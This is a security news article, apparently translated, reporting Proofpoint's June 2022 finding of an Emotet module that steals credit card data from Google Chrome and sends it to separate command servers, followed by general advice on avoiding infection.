Those responsible for the Emotet malware want to take advantage of the fact that they have one of the most widespread viruses in the world to steal credit card data saved in Google Chrome. In yet another expansion of the plague’s capabilities, security experts have detected the download of a new malicious module that can copy the information saved in the browser and send it to the scammers via command and control servers.
- Government of Japan launches tool that detects new version of Emotet malware
- Top 3 Cyber Threats for Android Devices
The practice was first detected last Monday (06) by experts from Proofpoint’s threat insights team. The credit card thief software was downloaded through the network of botnets serving Emotet and specifically targeted Google Chrome, also keeping an eye on the browser’s popularity; the experts also point out that the sending of data is dispersed between different servers, as a way of making blocking difficult.
This is yet another evolution of a threat that recently expanded its dissemination and contagion capabilities after adopting a 64-bit architecture. The change has increased the spread of Emotet around the world by up to 10 times, while more recently, criminals who spread it around have also turned to exploits involving Windows shortcuts, as awareness of widespread threats increases. through Office documents with contaminated macros.
On June 6th, Proofpoint observed a new #Emotet module being dropped by the E4 botnet. To our surprise it was a credit card stealer that was solely targeting the Chrome browser. Once card details were collected they were exfiltrated to different C2 servers than the module loader. pic.twitter.com/zy92TyYKzs
— Threat Insight (@threatinsight) June 7, 2022
PowerShell commands run on Windows from such dangerous data, downloading Emotet and also the modules needed for the attack that those responsible for the plague want to run. The roster of threats is large and has been expanding and evolving since 2014, when malware emerged; to this day, it is one of the most popular viruses in the world, and it can also be used to steal data, obtain gateways into systems and move laterally, increasing the spread on its own.
Not even the actions of the authorities last year were able to stop the evolution of Emotet, which not only did not cease to exist, but has been gaining more and more capabilities. A partnership with the cybercriminal group TrickBot, for example, allowed the necessary infrastructure to remain in the air even in the face of police operations, while those responsible continue to update the plague and sell it to third parties interested in carrying out attacks.
How to avoid Emotet virus infection?
Although the malware’s capabilities are highly advanced, its method of dissemination still largely depends on attachments sent via email or fraudulent messages posted on social media or sent via an application. These are the focus of attention of users, who should avoid clicking and downloading through these means so as not to contaminate themselves.
The alert is made especially for corporate users. Keeping security software on the computer also helps to prevent such compromises, while enterprise platforms should have systems for monitoring and searching for suspicious activity, as well as threat removal technologies.